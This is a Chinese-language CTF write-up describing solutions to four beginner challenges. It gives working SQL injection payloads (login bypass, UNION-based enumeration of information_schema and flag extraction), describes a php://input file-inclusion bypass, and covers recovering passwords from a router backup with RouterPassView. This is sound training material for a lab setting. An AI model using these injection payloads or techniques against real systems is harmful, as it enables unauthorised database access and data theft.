CTF小做

web签到题

打开得到以上,f12找到相关线索

base64解码得到flag

web2

得到注入点,万能密码尝试注入:

登入成功,发现该网站属于单引号字符型注入

开始查询:admin' or 1=1 union select 1,2,3#

找到数据库的库名:admin' or 1=1 union select 1,database(),3#

 得到web2,

继续查询:a' union select 1,(select group_concat(table_name) from information_schema.tables
where table_schema='web2'),3 #

接下来获取flag表的字段:

a' union select 1,
(select group_concat(column_name) from information_schema.columns
where table_schema='web2' and table_name='flag')
,3 #

得到回显flag

接下来获取flag表的数据:a' union select 1,(select flag from flag),3 #

得到flag

web3 

打开得到:

明显的一个文件包含漏洞

bp抓包,用php://input(可以访问请求的原始数据的只读流,将post请求的数据当作php代码执行。)协议尝试绕过。

这里运用input协议将下面的post 传的php语句

得到:一个链接直接打开:

得到flag。

荷兰宽带数据泄露

打开发现是一个格式为

.bin

的东西,与题目名联系起来尝试使用RouterPassView打开

知识点:路由器的备份文件通常包含了像ISP的用户名重要数据/密码、路由器的登录密码,是无线网络的关键。如果不小心失去了这些密码/钥匙,也可以通过路由器配置的备份文件找回。RouterPassView就是一个找回路由器密码的工具,可以帮助你从路由器中恢复丢失的密码。

 结合知识点尝试将搜索出的username和password分别带入flag中尝试发现flag是username。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值